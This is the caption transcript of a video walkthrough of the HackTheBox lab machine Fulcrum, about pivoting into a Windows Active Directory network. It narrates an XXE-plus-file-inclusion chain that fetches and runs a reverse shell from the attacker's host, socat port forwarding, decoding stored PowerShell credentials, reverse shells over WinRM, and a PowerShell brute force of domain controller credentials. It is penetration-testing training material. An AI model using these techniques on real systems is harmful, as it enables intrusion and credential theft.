Network Pivoting on Windows Active Directory | HackTheBox Fulcrum

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

welcome back to another video in today's video we're going to talk about pivoting on windows active directory previously we talked about pivoting on linux and we saw that using ssh local port forwarding and remote port forwarding have enabled us to communicate with other linux machines that may reside on other networks you can visit my video on docker exploitation we talked about pivoting on dockers at the same time the concepts can be applied in general or in general pivoting now how about windows what is the actual case what is the actual scenario that we can go through if you want to do pivoting on windows so i created this scenario here and the best perfect practical machine i found on the internet was hug the box fulcrum fulcrum this is you here well it's appears like four right fulcrum so this machine you can find on hack the box it best demonstrates the concept of pivoting on windows active directory machines so what happened so basically we have our attacker machine from which we do testing all the time we got access to a windows machine the windows machine actually resides on say a network such as 10 10 10 0. this is a for example right not the actual real network address now we got access to windows machine by sort of web exploitation so we landed some sort of shell right okay now once we where on the windows machine we found that there were uh another other machines on the network on different network so the windows machine is resides on a network which is totally different from this network here so the other network contains web server machine and file server machine and domain controller machine all of these machines are part of the domain the main domain control machine is here and they're all connected through the domain but the thing is these machines are actually located on a different network i call it the ad network so this is the ad network the active directory network and it's totally separate from the windows machine network so say you can you can call it here like 172 16 0 0 here so as far as this machine is concerned we are fine we got foothold on the machine through the exploitation right and specifically in the machine hack the box fulcrum it was x x e exploitation we exploited xml vulnerability in json all right so that's not the topic of this video we're going to demonstrate that when we get to into the practical part more importantly now how do we get from how do we interact with these machines from the our attacker box yes the solution is to use pivoting or port forwarding so from here from windows machine we apply port forwarding okay so that all connections that come on the windows machine say on specific port so we pick up a port such as say the port we selected on the machine was six two zero one five okay now we make the windows machine listens on this port and we create a rule such that the connections coming to this port will be forwarded into uh this machine the first machine is the web server machine so from port six two zero five we pour forward here oops okay no problem from six to zero five we pour forward from this port on another port on this machine now the selection of the sport the selection of the sports on the web server machine depends heavily on what kind of open ports on the web server machine are open we found that there are there is the port that is doing rm window import the windows instrumentation port open on this machine right so we forward from six to zero five okay into the sport now from my attacker machining what i do i connect to this port okay six two zero and five and the port forwarding rule i created on windows machine will take care of the rest will forward my connection from six to zero five to the to the uh when i import on the web server machine that's how i can interact now with the internal network okay from my attacker machine and once i am here i will be able to pivot to these machines easily right no need to create any other port forwarding rules again it's only one to get us inside the network once we are inside the network we can pivot freely from web server machine to file server machine and from file server toefl to the domain controller that's numbing process now what to use if you want to do port forwarding on windows there are several methods actually the first one we can use p-link p-link okay the other method we can use socat the method i use in this video and the one that worked for all people who did this machine it is with socat now you may need to use p-link in other scenarios that entirely depends on what works for you so now we talked about the theory let's now jump to the practical scenario let's close the board all right so this is the nmap scan running i'm gonna skip this part but we'll keep this running so that if we need to come back to it we're gonna we're gonna be able to do that so let's now copy the machine ip address and i'm gonna directly guys browse to the ports that were open you can do the in-mouse come on your own and you can find these ports as uh as they are so the first port it was for if you navigate to this port you will see that the machine will see that the page displaying the machine is under maintenance click on try again it takes you to another page but as you can see the the display or the contents of the page stay the same but the url changed take a look at this index.php and the other parameter page equal home this hints to a file inclusion vulnerability local file including vulnerability but we're going to be we're not going to be able not to do any anything with this vulnerability now we'll keep this at the node and we will get back to it later so the other port that is open on the machine is of course you can access it through the web it is five six four two three enable to connect let's see why is there a proxy uh-huh we have six here so we know the six five four so five six four two three let's see this now it worked as you can see we received a decent response pink punk heartbeat pink mock this is just a response now in json we can also exploit or you can also look for if there is xml vulnerability on the json site uh in this page it lays down how to play as you can see how to load the content type in order to export xse on recent endpoints so here is you can see all of the details basically what we're going to do we're going to play with the uh we're going to make a post request all right and the post request what we will do we're going to change the content type from json into xml and in the payload instead of sending a decent payload we will be sending an xml payload that's how we will exploit this vulnerability you see an example as you can see the post request sent to the vulnerable page the content type has been changed to application xml and instead of the json payload or json whatever content we did actually display an xml payload right the xml payload reads the contents of the password file and that's exactly what we will be doing remember that when we accessed the machine on port 4 there was a file including vulnerability we suspect of course that there is a file inclusion but it's a candidate for file including vulnerability now what does this mean it means that if we graph an xse payload so what it does the xc payload it will download okay download um say a php reversal from my machine all right once it downloads the php reversal i want to execute this how to execute this i will use local file inclusion in here i'm going to include it in here local file remote file inclusion so what can happen now the xxe payload instead of this one i'm going to use this url and instead of the home i will assign the value of or the path to the shell on my web server that's how we will be able to explore this vulnerability and get the first foothold okay back to the work back to work scan is finished as you can see these are open ports we have four we discovered this one we discovered other other ones we navigated through this one through this one now the other ones are 8c 88 22 and 999 all right so what is the next step next step is to navigate to the machine directory i created not clear okay so curl so this is how we will send the payload we will use cur right and we define the url the url is the machine ip address along with the ports dash x to specify the request the the http request type it is post and you specify the data as you can see this is the xxe payload let's go over the payload step by step it's easier to go over the payload here so xxe let's see yeah xc against jason so this is your payload by the way you can send the post request also in perp okay you can make uh the post request of the page and use perp if it is easier for you let's go over the payload so first we define the version of the xml the encoding no brainer next we define doctype in this this is since this is a test payload for the purpose of taking notes i named it as test but of course you can name it whatever you want next we define the entity that will hold the payload in my case i use the file itc password right to read the content of the password file now but the structure is the same in here we define or we put the payload you want whatever you want next we define root element it's very important for any xxe an xml payload to contain the root element without the root element it's going to work define the root elements and then here search name and in the value you can type here you can mention or you can call the entity you created which contains the payload we can call it by adding ampersand and the name of the entity along with the semicolon let's go back here so this is our payload right now i call it hack and the entity we name it entity xe so here i read let's see this one [Music] yeah so what happens here instead of reading the contents of the password file after system i defined the payload as such i browse to the machine ip address in this case it's localhost since it's viewed from the perspective of the machine itself and port 4. the port 4 is the one that is suspected to contain the inclusion vulnerability index php page equal now in here i include the path to shell the shell is a php reversal and i will host on my web server right now what's going to happen now once i send this payload the machine on 1010 106.2 will perform a call to this url and download and execute the shell okay so let's open up server so the python now the psp reversal take a note that the php reversal lets us on port or opens board four four five four five four five on my machine so i'm gonna now to open the listener to receive the incoming connection hopefully nc lvp four five four five so once i hit enter it's supposed to work ping pong aha it means we haven't looked at here we haven't received the request so this means something has changed i'm to need to take a look at my ip address is it correct aha the appear that has changed so it is three instead of two i'm gonna keep this running but in the payload we will modify the ip part instead of two i'm gonna put here three and we get back to the listener refile listener here and execute the payload as you can see the file has been requested let's take a look here but we haven't received anything we received pingpong getshell.php this means that the shell itself has the wrong parameters so let's check let's check the shell out this is a regular ph3 reversal uh-huh as you can see the ip is different now here we put three and now hopefully it's gonna work okay resend the payload now we receive the first foothold now from this point on we will discover what is the machine what is the machine we are on and then we perform the pivoting all right so let's see who we are first id and we are the dub dub data all right so pwd we are at slash this is the okay so now let's go to let's see if there is a directory called var ls yeah there is cdw so here is the web directory so we go to html nothing in the html let's go back let's go to uploads there you go there is the home the index and the upload php now there is one interesting script fulcrum upload to corp not ps1 if we cut this one taking a look at the contents of the script let's see here so to the forward the partial remoting port to the external interface password is now encrypted now this is a variable called one and the value is webuser here is two and we have three base64 four takes three all right which is this one to basically for value and convert to secure string dash key two so it's kind of encrypting the password so it's if actually this script is designed to create an encrypted password using the convert to string finally new object system management automation ps credential 1-4 the one is the web user and four is the encrypted password so basically what it does it creates encrypted passwords up to this point next what you are doing here we are creating a credential using the ps credential the unique feature of ps credential is that once you create a credential and assign it to a variable let's say five you can use five in whatever commands you want that require authentication this is an example invoke command that's computer upload fulcrum.local now this is clearly uh you see part of domain dash credential 5 dash file data ps1 so in order to connect to the computer upload here right with this file we have to define the credential since we use the method ps credential we can just mention the variable five and it would automatically recognize the username and the password which are webzer and the encrypted password that is stored in the variable4 that's the feature of ps credential okay so what is in this for us we end we got how the script working what do we do now so basically from ps credential we can revert the password and get the original form using get network credential let's see how this works so let's copy the script now to our local machine and try to get the password so the script is here i guess let's see what it is so got cat powershell this is the script which i have copied previously now if you execute the script here using bwsh to launch partial in cali and the name of the script once you execute that as you can see it gives you the password so what happened as you can see i added one line take a look at this this line is taking the credential 5 right stored in the variable 5 and uses the get network credential method which is used just to you know uh get the password back to its original form using the using the cm delete password and that's how now we managed to decrypt the password actually we didn't decrypt the password we just restored the password to its original form it's not decryption i'm not going to call a decryption we just use the method get network credential along with the password cm to get the password stored in the file variable that was formed here and note that if you want to use the get network credential method to restore passwords to its original form you're gonna you're gonna make sure that or you need to make sure that the password has been encrypted with the method ps credential if it was encrypted this method it means you can't restore it with get network credential you may need to use get credential which requires interaction with the gui interface all right let's not confuse now with all and not dig deep into non-relevant stuff in this video now that's how the work that's how the script works and that's how we restore the password now take a note that we now have username web user and password so what's the actual use of these two all right so we're going to get to that if we go now to the back to the machine here okay so now if we type ifconfig to see the configuration of the machine let's take a look so we have various network interfaces many interfaces we have to corp we have ins 32 which is the current one the loopback that's fine but take a look at this v i rbr0 this is a different network ip address which means back to the first back to the introduction of the video there is another network that resides on this or uses this ip address so you want to find out what is this network here so what do we do we're going to perform an nmap scan so let's go to temp and again my machine has the web server open on port 8000 and i have the nmap binary downloaded to my web server directory at fulcrum you can find this but you can copy this binary from the from your local kali machine or download it from the internet make sure it's the correct one going back here i'm going to say wget http retrieve the nmap from there 14 3 and then 8 000 and map so right now we have retrieved the nmap from the from the out for our machine let's now do an in-map scan on the entire network which network network that we have find i found here the six 9192168 one twenty two one now scanning the whole network is actually useful if you want to reveal what are the live hosts on this network but this won't be enough as we will see also the open ports or each of these of the machines on this network so let's take this ip address and scan it see what are the hosts on here first we have to define what is the subnet subnet mask it is 255250 which means the cidr is slash 24. so we go back and ls so chmod give nmap execution permissions okay nmap now now dash dash data dir and map we use this actually to mimic the scan process as as as if we're doing it from the attacking box or mic kali box and then we scan the network based ip 24 now we need to find what are the live hosts on the network now there is another method actually to just jump directly to the ip address of the machine or the machines that reside on this network instead of using nmap we can also use the arp table so the nmap scan has finished as you can see we have two live hosts the what the first one is 192.168.1221 these are the open ports as you can see i have kerberos active directory and lastly we have this one take a look at this ends with two two eights and these are the open ports so our focus and concentration now will go toward this one okay this is the next machine that we need to pivot into before just uh firing the socat listener we're gonna need to find if there are more open ports on this machine so again it should end map scan one more time but to discover all the ports on this machine hopefully this won't take much time all right so from the nmap scan results we see one more port has been discovered 5986 this is for the windows management instrumentation that is used for powershell remoting so what does this mean guys it means we can now use winrm to log in directly to the machine on ip address that ends with 228 but remember that we cannot do that from our attacking box from here since this machine resides on a totally different network than the network we have just compromised on this machine so what we're going to do we're going to now perform pivoting or poor forwarding using socat so let's see now uh where i can see the shortcuts look at using so cut what is using sawcard let's take a look sh so this is lateral movement all right let's see so cut now it has it has to offer so first we create the forwarding rule as you can see we define the port on which the machine will listen the compromise machine of course and will define the ip address of the other machine which we would like to access on the sport so let's copy that oh first we have to copy socat on the compromise machine so pwdvr attempt ls see if we have it we don't have it let's now use uh my web server for c3 um eight thousand slash soap cats so cat cannot be found unless i have so cat here what's the problem oh it is the w get guys oh my goodness how how can one forgets this so paste now we have so cats let's go back to my notes and copy this i'm giving it the same port i'm going to copy up until this point where i need to define the ip address since it is different all right so ipad is one two 192.168.122 two two eight right let me see yes it's correct and lastly do we have anything else to define nope it's ten percent what happens here remember that we are at the compromise machine now we are opening a ports six zero three threes right this machine or the compromise machine is now listening on the sports and incoming connections on this board will be forwarded to the machine that you would like to access okay now i forgot to here to put the ports that we would like to access in this case since we want to interact with the windows instrumentation port or partial remoting the port that you would like to interact with is 5986 so 5986 and that's it so directly now we can interact with the port swing rm permission denied thank you very much sage mode plus x so cat all right now it's ready all we have to do now is to send connections on port six zero three two threes and it will be forwarded to port five nine eight six remember that five n6 is done are imports which means we will be ending up interacting with partial so this needs to be done from a windows machine right but an alternative way is to use ruby okay the ruby language we can create a ruby script inside ruby script we can put partial commands so there is a script i found on the internet as you can see here it's authored by a user called element on github this is the script win our m shell with upload if you take a look at the script we need to define the ip and the port the ip and the port of what if the machine we have compromised and the port it's listening on username and password this is authentication it assumes that you have authentication information to access the powershell remoting if you remember we got access to these credentials web user and m4ng right this is the password we can use this credential guys to and supply them here and username and password next we are now as you can see using the winrm to interact with the machine we are targeting which is which happens to be the machine on 192.168.1228 all right so the script has already been created and my looking directory let's see here this is nmap reversion powershell let me take a look at this one cat script rb yeah this is the image the script let's now make slight modification on the script so instead of six zero two one seven i'm gonna type the port that i created as a listener port six zero three threes six zero three threes these are the correct credentials and now once we launch the script guides using ruby it will now interact with the port 5986 and give you partial access or partial remoting let's see how this works so sudo script uh okay ruby all right aha as you can see we get now powershell access now this partial access or partial remoting has been facilitated by the fact that there is the corresponding open port or the corresponding port on the target machine open if this wasn't open we cannot get to this right so take a note that now we are using the wind rm not reversion this is not a reversal this is the partial remoting access using port 5986 facilitated by the fact that we're using ruby here so we don't need to use windows power now on my windows machine that is how good is the script okay so right now we are where we are at the web server machine that we talked about earlier in the very first of the video right now we are inside the other network if we type ipconfig will this work let's take a look ethernet configuration 192.6855 aha windows ip configuration this is the ethernet adapter i don't know why it is 5 5 it should be 19122 anyways now let's start now enumerating this machine the observer one and see if there is another machine we can pivot into right let's see so since the name indicates the presence of server we're going to need to navigate to the server directory on windows active directory or windows server so it's cd c and we go to init pop slash dot root this is the web server directory in windows servers windows server uh-huh they are what do we have in here we have index and we have web config and pneumatic numeric configuration files is important and tremendously helpful when you are doing enumeration on compromised machines since configuration files may hold plain text credentials so type web.config let's see what are the configurations on this file okay connection string ldap dc fulcrum.local here we have the main domain fulcrum.local and here's the domain controller next what do we have add name system all right connection string name public key connection user name fulcrum ldap so this is another machine on the domain controller we have dc we have fulcrum okay and we have also the observer don't forget this so now we discovered another machine on the active directory network it is fulcrum backslash ldap and this is the uh password by the way this is not the this is not the oh my god this is not the machine name that's the username i know but actually it contains information about the machine name now here we have the connection password so what does this mean guys it means now we can create now or we can pivot to this machine using also winrm before doing so let's now execute a couple ldap queries to get more information about the domain controller and this machine here supposed to be here so now we execute some ldap queries to enumerate properties of these two common names let's see if i go to active directory and search for ldap partial script for user enumeration no nope nope nope nope executing ldap queries for data harvest that is cool let's see harvesting computer names so this is ldap where we can execute guys defining what is a domain controller in this case here we replace the main controller with the fulcrum target machine ldap the target machine name is fulcrum here if i am correct and we define the target machine password it's already here and then we display the properties all right let's take this one before taking that one let me define it here on my notes so domain controller will be replaced with fulcrum target machine will be also fulcrum target machine password will be this one let's see let's now execute this query see what it can yield displaying the properties about these two so we have two common names dc the domain controller and file that's the common name of the other machine that's fine now let's see if we can harvest other information so again we replace the fulcrum with the domain controller name or let's just copy that i don't want to mess up with the original one so copy that we have this target machine and the password where is the password there you go all right let's now find all of the properties and information about these two common names what is that let's see let's start from the very first name value okay common name description name bobby tables bad password time info password set to file saver log on okay that's the password for what let's scroll down cmb tables some account name b tables uh-huh that is the that's the machine which has which has the common name file i suppose this is the file server machine that is the username okay and that's supposed to be the password so now here we go you have the login information for what for the file server machine which resides as fptable at full chrome.local as username and this as the password so what's going to happen now we need to pivot to this machine somehow all right so we we can actually use the same method we can go back we can go to our ruby script and modify the script a bit to return a reverse cell now if you remember that if you go back to the machine to the mr scan you can see there is the port 53 open so we can actually make call outs from the web server the fire server machine this one to connect back to us what's going to happen now let me see what's going to happen let's go to under uh tab okay so ls this script here we can modify it a bit this is the modified version let me take a look at the modified version so this is the contents of the script version 2. again we are forwarding the connections on port 60333 in order to access other machines and we're using the same credentials we have discovered at the very first of the video okay next what we are doing here instead of opening a powershell remoting since we have one session here that uses powershell remoting on windows instrumentation port we cannot just create another one only we can only use one that's why we need another method to access the machine on our device server machine which has the common name file okay file.falcon.local this machine needs to be accessed in another method in order to to maintain this session here at the observer machine if you want to if you don't if you don't want to keep the current connection to the web server machine you can just cut it out and modify the script with the credentials we have just obtained which are b tables and this is the password and make now another power power a partial remoting connection to the web server machine to the file server machine but if you want to keep this connection we're gonna need to use another method so the method here is like like that so what happens here i prefer if we open this in the file editor in order to have a full view of the script desktop fulcrum and we take a look at this mousepad okay way better this is the for the forwarding and next what do we do here we create now a connection now in the connection first we create a variable called password the password contains or context the password have just found for the fire server and converts it into a secure string all right next we create a credential using the ps credential method and we specify an argument list the argument list is actually the connection information first we have the username b tables okay and next we have the password oops the password actually only to mention the variable since we have defined or we have defined the variable at the very first it contains the password in a secure string now we have defined the credentials we can now use the invoke command to what you know what to just create let the machine call out or perform call outs or reverse chat so we specify the computer name it's fine since this is the common name we have found dash credential grid the crit is actually the variable that stores the credential both username and password and the port the port is 5985 doing the distribution port and in here in the script log the content is the reversal itself we connect to my machine on port five three let's do this save yeah we don't need to save i haven't made any changes so okay so now this is the web server machine uh this i'm confused this is the original machine we have compromised fine web server machine let's now stop the observer and open the port or pseudo usually actually need to use pseudo credential in order to be able to open a port below then one zero to seven so here's this now we listen on incoming connections or incoming connections on 453 get back now we execute the script ruby script v2 and hopefully it will work hopefully i hope if it didn't work we may need to stop all of this ah we received the connection that's fine id so right now we are at the b table user who am i right now we have full chrome backslash tables totally different user this is the file server machine this is the observer machine we successfully perform the pivoting the last step is to perform pivoting to the domain controller okay now if we get back to the nmap scan we performed from the compromise machine remember that the these were the open ports 4 2 5 3 80 and 88 so the domain controller machine must have the net look on share open okay now the net look on share open is a share on the windows domain controller machine that contains uh look look look on scripts and other executables it's very useful if you enumerate this but how to access that from the file server machine you need to use also yeah i'm going to call it partial pivoting right so in this case i'm going to see where i can find the correct command because i can't memorize commands uh let me search for net look on accessing it logon share on windows dc i here is the command net use specified domain controller netlogon user name and password so let's see this net use to make it to our name is dc.full chrome dot local net log on ok user so user domain name backslash username domain name is fulcrum.local iweber so fulcrum backslash domain name username username is b tables guys it's b tables it's here so b and lastly we need to define the password the password of what the password of the machine we have just pivoted to so let me see where is the password in here this is the password the command has the command completed successfully okay let's see now if we can access the network on here see the microsoft powershell file system dc so successfully access the netlog on dir look we have several scripts here since netlook on contains information or contains uh the scripts and executables for the login these are the the scripts actually if we enumerate them or we take a look at one of them we can take we can actually get an idea of what happens when we when what happens in the login process and hopefully we reveal credentials let's take a look at this one for example yep copy that get or type all right map network drive user and password here we go we revealed one username and password but how do we know these are for the domain controller since now the last step is to pivot the domain controller we need the admin username and the password now all of these scripts are similar in content they both contain username uh definition of username and a password assigned to the corresponding variable but how do we know which one is for the domain controller so basically we need to do scripting here we need a partial script that iterates through all these scripts try them against the domain controller machine and gives us what is the correct pair of credentials say nano um brute force dc what do you think ps1 all right so here if define a function i'm going to call it brute force it takes two arguments username and password so we call the first one user and the next one is pass next we define take another line what about the indentation here okay this is fine so new object directory services directory entry and defined username user pass space name dash and e and then put that into null so that's the function it takes to the remainder two arguments and passwords and use them for the directory or prepares them for use in the directory services next we need a for loop here okay or a loop in partial it's called for each this loop will iterate through all of the files we have here these files so first let's create a variable called whatever coded files and define get child item since we need to since we need to we need the variable to iterate or to access a list of all the files we need to use the method get child item where will be here this is the path uh we have four here okay cancel the four and all the files that ends with ps1 next for each to for the iteration for each file in files okay now we need to create the list of variables that will hold the value from each attempt so let's call it first result select string path the file this variable will change the value of this variable will change every time it handles a different file so there's pattern next we define the pattern of the password let's take a look here so this is the pattern for all of the passwords you have at fulcrum this one is constant and these changes actually these characters change this is constant so some sort of regular expression would solve the problem so double quotes inside double quotes we open two single codes and inside the single quotes we open two parentheses and type here dot star okay next here we define the variables of both username and password since we use user and pass we're going to use different names so say user v1 does it make sense okay take the result we'll take the variable result from the first query and do some matches the first index groups one at one here and lastly value so the next one is kind of similar i'm going to copy that and here change the index to one this one needs to be pass lastly perform an if condition okay in the if condition in the conditional statement we will now try the credentials we have grabbed from the first file or from the files against the domain controller if they work we're going to display them back to the stood out so if we call the function br fulcrum and then we have first user v1 first argument wait so we have user v1 here it will replace the argument user if i'm correct okay that's fine next we have the next argument which is pass v1 which will be the corresponds to the pass argument in the function so pass v1 how many parentheses do we have in here so one okay next echo fulcrum i'm gonna copy this one it's way better so that v1 and pass v1 we echo out the username and password if they are correct that's the script now you can take all the script guys and make it as a one-liner okay i paused the video to finish uh pasting the comment in here and now it's running now in a separate part in a separate tab here i'm going to assume that we will get the username and password of the domain controller next we have two options the first one you can modify on the script v2 let's take a look at the script v2 what you can do here we can keep these as they are but modify on the line here instead of the instead of this password we're going to put the password that we will get from the script we have just created and instead of we're going to just do the modifications required the username the password of the domain controller and if i change this to dc all right and execute the script of course don't forget to create a listener on port 553 and you will get the reversal on the domain controller an alternative method is to just flat out get the flag right so we can do that easily with one liner let's see where i can find one liner here execute the remote commands on a domain machine with their pair of credentials so we can take this guys define the password in a variable called pass and then define the credential of the domain controller and then in the script block you can execute whatever you want let's take this one this one needs to be executed from the powershell so we need the session here we have the script hasn't finished yet so let me do it from here let's first modify what i guess because the shell isn't stable so password converse convert secure string as plain text and here is the pass the password will be i'm gonna just copy it from my notes guys okay this is the password for the dc and then credential we define the credential domain name username so here we define the domain in the windows fulcrum as you know so fulcrum the username for the dc was 923a as you will find now once the script finishes uh dash invoke comment that's computer name the computer name goes here it is dc dot folk from dot local credential grid we have it defined here dashboard 5985 the script to block the skill to block here will be displaying out d flag so cat c users administrator desktop slash root text let's try this here from the web server machine see if it works didn't work so as you can see the script has finished and here is the username and password fulcrum local 923a and this is the password these are the credentials that worked on the domain controller let's now execute now the oh no no what happened execute now this here from the observer machine see if it worked no cat nothing happened i guess right one more time and here is the flag now let me try to submit the flag submit flag difficulty of this machine i guess it is extremely hard yeah it was extremely hard actually submit all right guys so i hope you find the video informative and helpful and we will definitely see you in the next video

Info

Channel: Motasem Hamdan

Views: 5,959

Rating: undefined out of 5

Keywords: windows, pivoting

Id: RJ3qp4kjvuo

Channel Id: undefined

Length: 58min 36sec (3516 seconds)

Published: Wed Feb 09 2022